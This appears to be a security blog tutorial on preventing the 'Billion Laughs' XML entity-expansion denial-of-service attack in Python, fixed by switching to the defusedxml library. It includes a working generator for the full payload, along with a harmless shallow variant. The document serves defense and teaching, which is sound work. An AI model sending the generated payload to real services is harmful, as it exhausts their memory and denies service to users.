Preventing XML External Entity Attacks with Python
Introduction
One of the most prevalent web application vulnerabilities is the XML External Entity (XXE) attack. XXE is ranked fourth (A4) on the 2017 edition of the Open Web Application Security Project’s (OWASP) Top Ten list of web application security risks. [1] The XXE attack method allows “attackers [to] exploit vulnerable XML processors if they can upload XML or include hostile content in an XML document, exploiting vulnerable code, dependencies or integrations” [2], and “these flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.” [Ibid]
In this blog post, we will illustrate what this attack looks like through a practical example, show how it works in a Python-centric environment, and demonstrate a recommended way to address the problem with a few simple changes to your source code.
The “Billion Laughs” Denial of Service Attack
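One such attack, and the focus of this article, can be used to deny service to an application and is popularly known as “Billion Laughs”. It tricks vulnerable XML parsers into consuming vast amounts of system RAM through nested XML entity references. Strictly speaking, Billion Laughs abuses internal entity expansion rather than external entities, but it exploits the same entity-processing features of XML parsers and is commonly discussed alongside XXE.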
A Vulnerable Python Example
Consider the following XML document: [3]
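The original document listing did not survive. The payload is widely published, and the description that follows matches its usual form: a base entity “lol” and nine further entities, each defined as ten references to the one below it. The sketch below generates that payload, assuming this standard layout; the function names are hypothetical, and the file name is the one used later in this post.

```python
from pathlib import Path


def billion_laughs(depth: int = 9, fanout: int = 10) -> str:
    """Return a "Billion Laughs" XML payload as a string.

    The base entity "lol" is the literal text lol; each entity lolN is
    defined as `fanout` references to the entity one level below it, and
    the root element references the top entity, lol{depth}.
    """
    if depth < 1:
        raise ValueError("depth must be at least 1")
    declarations = ['  <!ENTITY lol "lol">']
    for level in range(1, depth + 1):
        below = "lol" if level == 1 else f"lol{level - 1}"
        refs = f"&{below};" * fanout
        declarations.append(f'  <!ENTITY lol{level} "{refs}">')
    lines = [
        '<?xml version="1.0"?>',
        "<!DOCTYPE lolz [",
        "  <!ELEMENT lolz (#PCDATA)>",
        *declarations,
        "]>",
        f"<lolz>&lol{depth};</lolz>",
    ]
    return "\n".join(lines) + "\n"


def write_payload(path: str = "billion_laughs_attack.xml", depth: int = 9) -> Path:
    """Hypothetical helper: save the payload. Writing it is harmless;
    the danger lies in parsing it with a vulnerable parser."""
    target = Path(path)
    target.write_text(billion_laughs(depth), encoding="utf-8")
    return target
```

Keeping the depth configurable makes it easy to build a shallow variant that is safe to experiment with.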
The above XML document contains a root element whose text is the entity reference “&lol9;”. When processed, “&lol9;” expands into ten references to “&lol8;”, each of which expands into ten references to “&lol7;”, and so on down the chain until the references finally resolve to the base text “lol”. A vulnerable XML processor will expand this small document until it contains 10 to the 9th power (one billion) copies of the string “lol”, hence the name of the attack.
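The growth is simple arithmetic: every level multiplies the number of copies by ten, so nine levels yield 10^9 copies of the three-character string “lol”, about 3 × 10^9 characters (roughly 3 GB of raw text) from a document of under a kilobyte, before counting any parser or Python object overhead. A small sketch of that calculation (the function name is hypothetical):

```python
def expansion_size(depth: int = 9, fanout: int = 10, base: str = "lol") -> tuple[int, int]:
    """Return (copies of base text, total characters) for &lol{depth};.

    Each entity level multiplies the copy count by `fanout`, so the
    top-level reference expands to fanout ** depth copies of `base`.
    """
    copies = fanout ** depth
    return copies, copies * len(base)


copies, chars = expansion_size()
print(f"{copies:,} copies of 'lol', {chars:,} characters")
# → 1,000,000,000 copies of 'lol', 3,000,000,000 characters
```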
Now, consider this simple Python code example:
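The original code listing was also lost. Going by the description below, it was a single standard-library parse call, shown here as a comment and assuming the file name mentioned below. So that the sketch can be run safely, it demonstrates the same entity expansion on a hypothetical two-level version of the payload instead of the full nine-level file.

```python
import xml.etree.ElementTree as ET

# The article's vulnerable one-liner (do NOT run it against the full payload):
#     tree = ET.parse("billion_laughs_attack.xml")

# Shallow, harmless variant: lol2 -> 10 x lol1 -> 10 x "lol" each.
SHALLOW_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""


def expanded_text(xml_text: str) -> str:
    """Parse with the standard library and return the root element's text."""
    root = ET.fromstring(xml_text)
    return root.text or ""


# The parser silently expands the nested entities into 100 copies of "lol".
print(len(expanded_text(SHALLOW_PAYLOAD)))  # → 300
```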
The above Python code uses ElementTree (the xml.etree.ElementTree module built into the Python standard library) to parse our XML document, named “billion_laughs_attack.xml” in our example. When executed, this one line of code begins consuming a copious amount of system resources as it expands all of the entities. When I ran this code on my laptop, it consumed all of the free memory on a machine with 32 GB of RAM (everything not already in use by other running processes) and raised a MemoryError, the exception Python raises when an operation runs out of memory.
The image on the left shows a snapshot of my system memory before running the example code, and the image on the right shows a snapshot afterward. These images make clear just how serious this attack can be if exploited. Add the fact that we are using nothing but the Python standard library, and it should become evident that we have a potentially dangerous situation on our hands.
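Whether you reproduce this exact result depends on the Expat library your Python build links against. The Python documentation’s notes on XML vulnerabilities state that Expat 2.4.1 and newer is not vulnerable to Billion Laughs, so on an up-to-date interpreter the same call may instead reject the document with a parse error. A minimal sketch for checking which Expat you have (the helper name is hypothetical):

```python
from xml.parsers import expat

# Per the Python docs' XML vulnerabilities notes, Expat 2.4.1+ limits
# "billion laughs"-style entity amplification.
PROTECTED_SINCE = (2, 4, 1)


def expat_limits_amplification() -> bool:
    """Return True if the linked Expat is at least version 2.4.1."""
    return expat.version_info >= PROTECTED_SINCE


print(expat.EXPAT_VERSION)  # a string such as "expat_2.x.y"; varies by build
print(expat_limits_amplification())
```

Even with a protected Expat, the standard library parsers are not hardened against every entity-based attack, which is why the library below is still worth using for untrusted input.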
The DefusedXML Library
Luckily, one solution to this kind of attack is very simple to employ. The DefusedXML Python package (defusedxml) provides drop-in replacements for the standard library’s XML parsing modules that refuse to process the XML features most often abused, such as entity declarations and external references. Consider the example below: [4]
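This listing was lost as well. Based on the description that follows, the change amounts to swapping the import. The sketch below assumes the defusedxml package is installed (pip install defusedxml) and uses its defusedxml.ElementTree module and EntitiesForbidden exception; the is_rejected helper is hypothetical.

```python
import defusedxml.ElementTree as ET  # drop-in replacement for xml.etree.ElementTree
from defusedxml import EntitiesForbidden

# The article's one-line example, assuming the payload file from earlier:
#     tree = ET.parse("billion_laughs_attack.xml")  # raises EntitiesForbidden


def is_rejected(xml_text: str) -> bool:
    """Return True if DefusedXML refuses to parse the document."""
    try:
        ET.fromstring(xml_text)
    except EntitiesForbidden:
        return True
    return False


# A benign document parses normally...
print(is_rejected("<lolz>hello</lolz>"))  # → False
# ...but any entity declaration is refused before expansion begins.
print(is_rejected('<!DOCTYPE lolz [<!ENTITY lol "lol">]><lolz>&lol;</lolz>'))  # → True
```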
This Python snippet differs from our previous example in one crucial way: the import statement now takes ElementTree from the DefusedXML library (defusedxml.ElementTree) instead of from the standard library’s xml.etree package. When executed, this code fails immediately with an EntitiesForbidden exception, before any entities are expanded.
Web application code can use this library to prevent the “Billion Laughs” attack and other well-known XXE vulnerabilities, as this simple example illustrates. The DefusedXML documentation cited above goes into depth on what the library protects against and walks through some common examples.
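To see why the DefusedXML version fails fast, here is a rough, stdlib-only sketch of a similar idea: abort as soon as the parser reports an entity declaration, before any reference can be expanded. It is a hand-rolled illustration built on the EntityDeclHandler hook of xml.parsers.expat, not DefusedXML’s actual code; the exception class and function name are hypothetical, and in production the maintained library is the better choice.

```python
from xml.parsers import expat


class EntityDeclarationForbidden(ValueError):
    """Hypothetical exception for documents that declare entities."""


def parse_element_names(xml_text: str) -> list[str]:
    """Parse xml_text with Expat, refusing any entity declaration.

    Returns element names in document order (a stand-in for real processing).
    """
    parser = expat.ParserCreate()
    names: list[str] = []

    def forbid_entity(name, is_parameter_entity, value, base,
                      system_id, public_id, notation_name):
        # Called for every <!ENTITY ...> declaration; raising here stops
        # parsing, and the exception propagates out of parser.Parse().
        raise EntityDeclarationForbidden(f"entity {name!r} declared")

    def start_element(name, attrs):
        names.append(name)

    parser.EntityDeclHandler = forbid_entity
    parser.StartElementHandler = start_element
    parser.Parse(xml_text, True)
    return names


print(parse_element_names("<lolz><lol/></lolz>"))  # → ['lolz', 'lol']
```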
Conclusion
XXE is an often-overlooked category of attack in web application development, but simple, easy-to-use tools are available to mitigate these risks. We have focused on one of a handful of scenarios in this post, but I encourage readers to investigate this class of attacks in more depth, especially given how prevalent XML is as a data interchange format.